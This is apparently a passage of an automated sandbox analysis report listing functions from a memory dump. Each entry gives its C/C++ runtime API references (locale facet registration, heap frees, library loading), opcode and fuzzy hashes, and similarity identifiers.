std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9
moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3
messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD
moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BE685, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 341COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD50B: IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4BE835,?,?,?,?,6D4BE211,?,00000004), ref: 6D4CD5ED

Part of subcall function 6D4B40F5: IsProcessorFeaturePresent.KERNEL32(00000017,6D4B40C7,^Km,00000000,00000000,00000000,00000000,?,?,?,6D4B40D4,00000000,00000000,00000000,00000000,00000000), ref: 6D4B40F7
Part of subcall function 6D4B40F5: GetCurrentProcess.KERNEL32(C0000417,00000000,6D4B5EE6,?), ref: 6D4B4119
Part of subcall function 6D4B40F5: TerminateProcess.KERNEL32(00000000), ref: 6D4B4120

Part of subcall function 6D4B472E: RtlEnterCriticalSection.NTDLL(?), ref: 6D4B473D

_free.LIBCMT ref: 6D4BEA3B

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4BEA90

Strings

=R-, xrefs: 6D4BE690

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Process_free$CodeCriticalCurrentEnterErrorFeatureFreeHeapLastPagePresentProcessorSectionTerminateValid
String ID: =R-
API String ID: 1579271482-526339512
Opcode ID: 9ef07bf05ae134273e587287ad281e983ab4c8945de56c3c9339c8f7dd544046
Instruction ID: 629ef0e040ed76774385eebf60ce16ed25c8e88aa31a8c2127836c2cad480396
Opcode Fuzzy Hash: 9ef07bf05ae134273e587287ad281e983ab4c8945de56c3c9339c8f7dd544046
Instruction Fuzzy Hash: C6B1AD759042169BEB25DF25CC80FBA77B9EFA8344F1144F9EE18D7240E7319E81CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C286F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,?,?,?,6D4C2BCE,?,?,?), ref: 6D4C2922
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,6D4C2BCE,?,?,?,?,?,?,?,?,?), ref: 6D4C2950
GetLastError.KERNEL32(?,6D4C2BCE,?,?,?,?,?,?,?,?,?,?,6D5324C0,00000014,6D4B3C4C,00000000), ref: 6D4C2981

Strings

=R-, xrefs: 6D4C287E

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: =R-
API String ID: 2456169464-526339512
Opcode ID: f0a21b4da18e588d7b4ace3ac9266eda0147fcd508261bc9f0b0cc56988dd8f0
Instruction ID: 452224a7f162e740e15062a1fdb14f15f4f492c1222d81794c6b9373ade16df2
Opcode Fuzzy Hash: f0a21b4da18e588d7b4ace3ac9266eda0147fcd508261bc9f0b0cc56988dd8f0
Instruction Fuzzy Hash: E3318E75B0021A9FDB24CF69DCD0AEAB7B8EB08300F0445AEE909D7250DB70AD80CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8BA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C8C13
_free.LIBCMT ref: 6D4C8C69

Part of subcall function 6D4C8A45: _free.LIBCMT ref: 6D4C8A9D
Part of subcall function 6D4C8A45: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
Part of subcall function 6D4C8A45: WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
Part of subcall function 6D4C8A45: WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54

Strings

=R-, xrefs: 6D4C8BAB

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: =R-
API String ID: 314583886-526339512
Opcode ID: 797d48b396ddb108a74e7333b1406edbd15d9b33ea19ff3b54beccd4ebc78099
Instruction ID: 730231aeae1f0d9608fd7b8e220aaff969ecacdf34123388cdd9211cab8ed684
Opcode Fuzzy Hash: 797d48b396ddb108a74e7333b1406edbd15d9b33ea19ff3b54beccd4ebc78099
Instruction Fuzzy Hash: 8021DE7E80911557DF31D6358DC4FEA77789B85324F22025BE694A7180EB704DC189D3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAE11, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,6D506D64,00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002), ref: 6D4BAE31
GetProcAddress.KERNEL32(00000000,6D506D7C), ref: 6D4BAE44
FreeLibrary.KERNEL32(00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002,00000000), ref: 6D4BAE67

Strings

=R-, xrefs: 6D4BAE18

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: =R-
API String ID: 4061214504-526339512
Opcode ID: e753bc5fee3da3bb3b2c2efc03ee9121022925889ffb2f1540279514005aac43
Instruction ID: e02290dc86b04233e2f2b8b2e8679f6edb898cb4b566691209f55b60665c633d
Opcode Fuzzy Hash: e753bc5fee3da3bb3b2c2efc03ee9121022925889ffb2f1540279514005aac43
Instruction Fuzzy Hash: AEF06231900208BBDF119FA5CC49FAEBFF5EF09711F114169F905A6640DB718E40CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B40F5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6D4B40C7,^Km,00000000,00000000,00000000,00000000,?,?,?,6D4B40D4,00000000,00000000,00000000,00000000,00000000), ref: 6D4B40F7
GetCurrentProcess.KERNEL32(C0000417,00000000,6D4B5EE6,?), ref: 6D4B4119
TerminateProcess.KERNEL32(00000000), ref: 6D4B4120

Strings

=R-, xrefs: 6D4B4105

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate
String ID: =R-
API String ID: 124695548-526339512
Opcode ID: df15ec0922125f9799db7b1b3b11a8aafa15eb0fd8154fdf973b773f9f7f8a91
Instruction ID: beca9caa642538b3e1fc23174eb08a4277a56f336c48744db5beafdd3bcf64d1
Opcode Fuzzy Hash: df15ec0922125f9799db7b1b3b11a8aafa15eb0fd8154fdf973b773f9f7f8a91
Instruction Fuzzy Hash: E4D0A771A8422162FE0066622C0FFF7193CCF17769F07402ABB09995C2EB604D4195F5

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45
std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB
std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49
std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF
std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F
std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F
std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37
std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD
std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1
std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480961
std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03
std::_Facet_Register.LIBCPMT ref: 6D47BA54
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481083
std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480815
std::_Facet_Register.LIBCPMT ref: 6D480866
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480886
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4808A4

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction ID: 501574e1bb70185e12b83917f32164f2108c4853dd2509aec750a55c50116b95
Opcode Fuzzy Hash: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction Fuzzy Hash: 7311EC32C042298BCF19DFA1D844EEE7B75AF85394F26040DE610AB290DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4808AA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB
std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9
std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
